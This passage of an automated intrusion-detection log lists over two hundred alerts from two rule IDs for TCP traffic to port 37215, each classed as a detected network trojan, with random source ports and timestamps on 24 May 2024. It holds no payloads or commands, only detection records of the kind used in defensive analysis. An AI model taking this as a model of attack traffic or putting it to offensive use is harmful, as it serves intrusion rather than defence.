              SID:2835222
              Source Port:48522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054263
              SID:2829579
              Source Port:41534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857633
              SID:2829579
              Source Port:52292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300194
              SID:2835222
              Source Port:46216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308691
              SID:2835222
              Source Port:39366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424324
              SID:2829579
              Source Port:57092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250913
              SID:2829579
              Source Port:50614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404451
              SID:2829579
              Source Port:37776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801574
              SID:2835222
              Source Port:42266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801983
              SID:2829579
              Source Port:51448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459116
              SID:2829579
              Source Port:59750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543590
              SID:2829579
              Source Port:43022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.684986
              SID:2829579
              Source Port:37468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283528
              SID:2829579
              Source Port:51140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079818
              SID:2829579
              Source Port:42538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446930
              SID:2835222
              Source Port:58914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441337
              SID:2829579
              Source Port:49938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575306
              SID:2829579
              Source Port:38466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923541
              SID:2835222
              Source Port:48786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859008
              SID:2829579
              Source Port:34142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071496
              SID:2829579
              Source Port:37658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491493
              SID:2835222
              Source Port:38100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507647
              SID:2835222
              Source Port:41568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545296
              SID:2835222
              Source Port:34430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.680386
              SID:2829579
              Source Port:40026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764587
              SID:2829579
              Source Port:45596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631179
              SID:2835222
              Source Port:43974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495229
              SID:2829579
              Source Port:48136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341178
              SID:2835222
              Source Port:59660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396452
              SID:2829579
              Source Port:55744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421488
              SID:2829579
              Source Port:59692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976745
              SID:2835222
              Source Port:48738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394010
              SID:2835222
              Source Port:33374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483092
              SID:2829579
              Source Port:50426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700474
              SID:2835222
              Source Port:50882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428806
              SID:2829579
              Source Port:35514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802384
              SID:2829579
              Source Port:35216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859011
              SID:2829579
              Source Port:57230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110924
              SID:2829579
              Source Port:40862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153061
              SID:2829579
              Source Port:53712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374659
              SID:2829579
              Source Port:50712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661298
              SID:2829579
              Source Port:57034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449945
              SID:2829579
              Source Port:60162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725499
              SID:2835222
              Source Port:39650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594851
              SID:2829579
              Source Port:48778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121443
              SID:2829579
              Source Port:60604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536646
              SID:2835222
              Source Port:55152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044621
              SID:2829579
              Source Port:54894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117372
              SID:2829579
              Source Port:38946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278649
              SID:2835222
              Source Port:60532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641637
              SID:2829579
              Source Port:59496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059554
              SID:2835222
              Source Port:33380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374501
              SID:2829579
              Source Port:60976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727332
              SID:2835222
              Source Port:41672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332387
              SID:2829579
              Source Port:53262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482235
              SID:2835222
              Source Port:54492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076971
              SID:2835222
              Source Port:33876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545543
              SID:2829579
              Source Port:56398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.513612
              SID:2829579
              Source Port:51424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492362
              SID:2829579
              Source Port:40108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049071
              SID:2835222
              Source Port:55788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487376
              SID:2829579
              Source Port:49862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188375
              SID:2835222
              Source Port:46364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280241
              SID:2835222
              Source Port:52158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432630
              SID:2829579
              Source Port:41812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421498
              SID:2835222
              Source Port:34484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637941
              SID:2835222
              Source Port:36756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982354
              SID:2835222
              Source Port:54538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341573
              SID:2829579
              Source Port:54372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445201
              SID:2829579
              Source Port:42248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429710
              SID:2835222
              Source Port:45476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504100
              SID:2835222
              Source Port:36140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194479
              SID:2835222
              Source Port:55234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281563
              SID:2835222
              Source Port:35962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209005
              SID:2829579
              Source Port:56602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578841
              SID:2835222
              Source Port:46254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303422
              SID:2835222
              Source Port:37212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396675
              SID:2835222
              Source Port:46214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374636
              SID:2829579
              Source Port:37522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.463134
              SID:2829579
              Source Port:51126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278348
              SID:2829579
              Source Port:56226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282859
              SID:2835222
              Source Port:33076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103036
              SID:2835222
              Source Port:37222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189001
              SID:2835222
              Source Port:40154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663410
              SID:2829579
              Source Port:51120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061781
              SID:2835222
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049802
              SID:2835222
              Source Port:45724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167444
              SID:2835222
              Source Port:47814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484611
              SID:2829579
              Source Port:33610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098832
              SID:2835222
              Source Port:53646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493086
              SID:2829579
              Source Port:51304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254312
              SID:2835222
              Source Port:48082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361050
              SID:2835222
              Source Port:48218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574422
              SID:2829579
              Source Port:35526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873734
              SID:2829579
              Source Port:40846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486128
              SID:2835222
              Source Port:60216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574687
              SID:2835222
              Source Port:54056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545461
              SID:2835222
              Source Port:38428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835148
              SID:2829579
              Source Port:56994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485215
              SID:2835222
              Source Port:55694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693136
              SID:2829579
              Source Port:51792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873932
              SID:2835222
              Source Port:39036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.347046
              SID:2829579
              Source Port:47086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623451
              SID:2829579
              Source Port:59562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492386
              SID:2829579
              Source Port:57622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365336
              SID:2829579
              Source Port:60742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.491473
              SID:2829579
              Source Port:55406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.660875
              SID:2835222
              Source Port:41810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343650
              SID:2835222
              Source Port:48176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113691
              SID:2835222
              Source Port:45384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516504
              SID:2835222
              Source Port:34882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313269
              SID:2835222
              Source Port:45894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.770910
              SID:2835222
              Source Port:38160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457650
              SID:2835222
              Source Port:52250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861928
              SID:2835222
              Source Port:39670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377454
              SID:2835222
              Source Port:55048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450115
              SID:2829579
              Source Port:54224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526836
              SID:2835222
              Source Port:40380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969388
              SID:2835222
              Source Port:53662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574318
              SID:2835222
              Source Port:43408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452640
              SID:2829579
              Source Port:46444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537053
              SID:2835222
              Source Port:43520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154315
              SID:2829579
              Source Port:47646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119852
              SID:2829579
              Source Port:37664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870744
              SID:2829579
              Source Port:35018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188831
              SID:2835222
              Source Port:48548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398435
              SID:2829579
              Source Port:48222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542257
              SID:2835222
              Source Port:36394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586081
              SID:2835222
              Source Port:37874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268535
              SID:2829579
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661361
              SID:2835222
              Source Port:56416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.795996
              SID:2835222
              Source Port:38130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187387
              SID:2835222
              Source Port:54118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858938
              SID:2835222
              Source Port:35040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313354
              SID:2829579
              Source Port:60938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449140
              SID:2829579
              Source Port:33206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.185911
              SID:2829579
              Source Port:52760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115310
              SID:2835222
              Source Port:58680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456814
              SID:2829579
              Source Port:32976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804646
              SID:2829579
              Source Port:52808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506415
              SID:2829579
              Source Port:33156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396213
              SID:2829579
              Source Port:54614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100541
              SID:2829579
              Source Port:49008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969194
              SID:2835222
              Source Port:37426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062398
              SID:2829579
              Source Port:39150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234711
              SID:2829579
              Source Port:54668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494429
              SID:2835222
              Source Port:52104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115942
              SID:2829579
              Source Port:46848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478464
              SID:2829579
              Source Port:41908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055558
              SID:2829579
              Source Port:45546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041102
              SID:2835222
              Source Port:55738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100863
              SID:2829579
              Source Port:43348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040894
              SID:2829579
              Source Port:60014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111480
              SID:2829579
              Source Port:38024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537978
              SID:2835222
              Source Port:53322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573280
              SID:2829579
              Source Port:45842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189528
              SID:2829579
              Source Port:53874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.632762
              SID:2829579
              Source Port:54256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.533317
              SID:2835222
              Source Port:51438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661021
              SID:2835222
              Source Port:45270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859030
              SID:2835222
              Source Port:49516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194047
              SID:2835222
              Source Port:60728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543533
              SID:2829579
              Source Port:46298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103584
              SID:2829579
              Source Port:60378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871930
              SID:2835222
              Source Port:39216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.206434
              SID:2835222
              Source Port:38958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286890
              SID:2835222
              Source Port:54852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459914
              SID:2835222
              Source Port:57670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102199
              SID:2829579
              Source Port:60616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165537
              SID:2835222
              Source Port:34050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583806
              SID:2829579
              Source Port:33272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.264776
              SID:2829579
              Source Port:40474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621391
              SID:2829579
              Source Port:51372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362153
              SID:2835222
              Source Port:41098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583903
              SID:2835222
              Source Port:46744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.076238
              SID:2835222
              Source Port:50004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334220
              SID:2829579
              Source Port:54198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693198
              SID:2829579
              Source Port:54796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802194
              SID:2835222
              Source Port:47032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122896
              SID:2829579
              Source Port:53452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.377173
              SID:2829579
              Source Port:32882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548122
              SID:2829579
              Source Port:60730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049621
              SID:2835222
              Source Port:50934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053497
              SID:2829579
              Source Port:52784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246507
              SID:2835222
              Source Port:34730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692245
              SID:2829579
              Source Port:49594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420495
              SID:2829579
              Source Port:59218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313719
              SID:2829579
              Source Port:59722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817758
              SID:2835222
              Source Port:52572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663563
              SID:2829579
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101691
              SID:2829579
              Source Port:33646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433270
              SID:2829579
              Source Port:55056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.348079
              SID:2829579
              Source Port:51534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926747
              SID:2829579
              Source Port:56060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551734
              SID:2829579
              Source Port:40622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202648
              SID:2829579
              Source Port:53010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.362331
              SID:2835222
              Source Port:33552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341573
              SID:2835222
              Source Port:48640
              Destination Port:37215
